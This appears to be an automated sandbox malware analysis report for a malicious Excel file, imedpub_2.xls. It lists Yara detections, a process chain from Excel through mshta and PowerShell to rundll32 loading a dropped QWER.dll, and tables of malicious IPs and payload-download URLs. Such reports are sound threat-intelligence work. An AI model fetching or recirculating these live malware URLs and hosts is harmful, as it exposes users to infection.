Source: Yara match File source: 15.2.rundll32.exe.420000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.9d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.aa0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.523913691.0000000002621000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.578128416.00000000028F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.523436520.0000000000331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.577400839.0000000000320000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.674984852.0000000000761000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.646503314.0000000002580000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675100735.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.577595095.0000000000411000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.646421210.0000000000C41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.577894458.0000000000AD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.577987476.0000000002480000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.580780340.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.646662898.0000000002F91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.577837506.0000000000A71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.645935439.0000000000140000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.578250004.0000000002FC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.646563852.0000000002670000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.526646791.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.523882749.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.646381329.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.526815635.0000000000261000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.577793052.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.524151860.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.464757421.0000000000290000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.581619652.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.523693615.0000000000AB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.577428378.0000000000351000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.523730343.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.523853691.00000000025C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.580991991.0000000000241000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.674911093.0000000000710000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.523666393.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.523513402.00000000004F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.645964256.0000000000181000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.646120317.0000000000420000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675173904.0000000000821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.523491147.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.527063809.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.646698678.0000000002FD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.646029506.0000000000310000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.646064656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.523130788.0000000000140000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.649782159.0000000000211000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.577866677.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675036629.00000000007C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.646641702.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.577472790.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.523994055.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675503420.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.646764610.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.524063481.0000000003151000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.578315852.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.650185514.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.578085930.0000000002870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.578205625.0000000002F50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.646533313.00000000025F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.645994754.0000000000220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.646245001.00000000004A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.649670122.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.646590734.00000000029F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675011000.0000000000790000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.523320512.0000000000300000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.578029021.00000000027B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\QWER.dll, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562406 Sample: imedpub_2.xls Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 51 129.232.188.93 xneeloZA South Africa 2->51 53 162.214.50.39 UNIFIEDLAYER-AS-1US United States 2->53 55 43 other IPs or domains 2->55 65 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->65 67 Found malware configuration 2->67 69 Malicious sample detected (through community Yara rule) 2->69 71 16 other signatures 2->71 15 EXCEL.EXE 53 12 2->15         started        signatures3 process4 file5 49 C:\Users\user\Desktop\imedpub_2.xls, Composite 15->49 dropped 18 cmd.exe 15->18         started        process6 process7 20 mshta.exe 11 18->20         started        dnsIp8 57 91.240.118.168, 49165, 49166, 80 GLOBALLAYERNL unknown 20->57 23 powershell.exe 16 7 20->23         started        process9 dnsIp10 59 dtmconsulting.ca 162.241.211.118, 443, 49169 UNIFIEDLAYER-AS-1US United States 23->59 61 praachichemfood.com 103.138.189.128, 49167, 49168, 80 GBLINK-AS-APGBLINKNETWORKSOLUTIONSPRIVATELIMITEDIN India 23->61 63 www.praachichemfood.com 23->63 47 C:\ProgramData\QWER.dll, PE32 23->47 dropped 77 Powershell drops PE file 23->77 28 cmd.exe 23->28         started        file11 signatures12 process13 process14 30 rundll32.exe 28->30         started        32 rundll32.exe 28->32         started        process15 34 rundll32.exe 1 30->34         started        file16 45 C:\Windows\SysWOW64\...\pagi.wrr (copy), PE32 34->45 dropped 73 Hides that the sample has been downloaded from the Internet (zone.identifier) 34->73 38 rundll32.exe 34->38         started        signatures17 process18 process19 40 rundll32.exe 1 38->40         started        signatures20 75 Hides that the sample has been downloaded from the Internet (zone.identifier) 40->75 43 rundll32.exe 40->43         started        process21
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
195.154.133.20
 unknown France
12876 OnlineSASFR true
185.157.82.211
 unknown Poland
42927 S-NET-ASPL true
212.237.17.99
 unknown Italy
31034 ARUBA-ASNIT true
79.172.212.216
 unknown Hungary
61998 SZERVERPLEXHU true
110.232.117.186
 unknown Australia
56038 RACKCORP-APRackCorpAU true
173.214.173.220
 unknown United States
19318 IS-AS-1US true
212.24.98.99
 unknown Lithuania
62282 RACKRAYUABRakrejusLT true
138.185.72.26
 unknown Brazil
264343 EmpasoftLtdaMeBR true
178.63.25.185
 unknown Germany
24940 HETZNER-ASDE true
160.16.102.168
 unknown Japan 9370 SAKURA-BSAKURAInternetIncJP true
81.0.236.90
 unknown Czech Republic
15685 CASABLANCA-ASInternetCollocationProviderCZ true
103.75.201.2
 unknown Thailand
133496 CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH true
216.158.226.206
 unknown United States
19318 IS-AS-1US true
45.118.115.99
 unknown Indonesia
131717 IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaID true
51.15.4.22
 unknown France
12876 OnlineSASFR true
159.89.230.105
 unknown United States
14061 DIGITALOCEAN-ASNUS true
162.214.50.39
 unknown United States
46606 UNIFIEDLAYER-AS-1US true
91.240.118.168
 unknown unknown
49453 GLOBALLAYERNL true
200.17.134.35
 unknown Brazil
1916 AssociacaoRedeNacionaldeEnsinoePesquisaBR true
217.182.143.207
 unknown France
16276 OVHFR true
107.182.225.142
 unknown United States
32780 HOSTINGSERVICES-INCUS true
51.38.71.0
 unknown France
16276 OVHFR true
45.118.135.203
 unknown Japan 63949 LINODE-APLinodeLLCUS true
50.116.54.215
 unknown United States
63949 LINODE-APLinodeLLCUS true
103.138.189.128
 praachichemfood.com India
139035 GBLINK-AS-APGBLINKNETWORKSOLUTIONSPRIVATELIMITEDIN false
131.100.24.231
 unknown Brazil
61635 GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBR true
46.55.222.11
 unknown Bulgaria
34841 BALCHIKNETBG true
41.76.108.46
 unknown South Africa
327979 DIAMATRIXZA true
173.212.193.249
 unknown Germany
51167 CONTABODE true
45.176.232.124
 unknown Colombia
267869 CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOC true
178.79.147.66
 unknown United Kingdom
63949 LINODE-APLinodeLLCUS true
212.237.5.209
 unknown Italy
31034 ARUBA-ASNIT true
162.243.175.63
 unknown United States
14061 DIGITALOCEAN-ASNUS true
176.104.106.96
 unknown Serbia
198371 NINETRS true
207.38.84.195
 unknown United States
30083 AS-30083-GO-DADDY-COM-LLCUS true
162.241.211.118
 dtmconsulting.ca United States
46606 UNIFIEDLAYER-AS-1US false
164.68.99.3
 unknown Germany
51167 CONTABODE true
192.254.71.210
 unknown United States
64235 BIGBRAINUS true
212.237.56.116
 unknown Italy
31034 ARUBA-ASNIT true
104.168.155.129
 unknown United States
54290 HOSTWINDSUS true
45.142.114.231
 unknown Germany
44066 DE-FIRSTCOLOwwwfirst-colonetDE true
203.114.109.124
 unknown Thailand
131293 TOT-LLI-AS-APTOTPublicCompanyLimitedTH true
209.59.138.75
 unknown United States
32244 LIQUIDWEBUS true
159.8.59.82
 unknown United States
36351 SOFTLAYERUS true
129.232.188.93
 unknown South Africa
37153 xneeloZA true
58.227.42.236
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR true
158.69.222.101
 unknown Canada
16276 OVHFR true
104.251.214.46
 unknown United States
54540 INCERO-HVVCUS true

Contacted Domains

Name IP Active
dtmconsulting.ca 162.241.211.118 true
praachichemfood.com 103.138.189.128 true
www.praachichemfood.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://dtmconsulting.ca/wp-includes/dkCFwyE/ true
  • Avira URL Cloud: malware
 unknown
http://praachichemfood.com/public_html/SWmteCWBUkA89/ true
  • Avira URL Cloud: malware
 unknown
http://91.240.118.168/zqqw/zaas/fe.png true
  • Avira URL Cloud: malware
 unknown
http://91.240.118.168/zqqw/zaas/fe.html true
  • Avira URL Cloud: malware
 unknown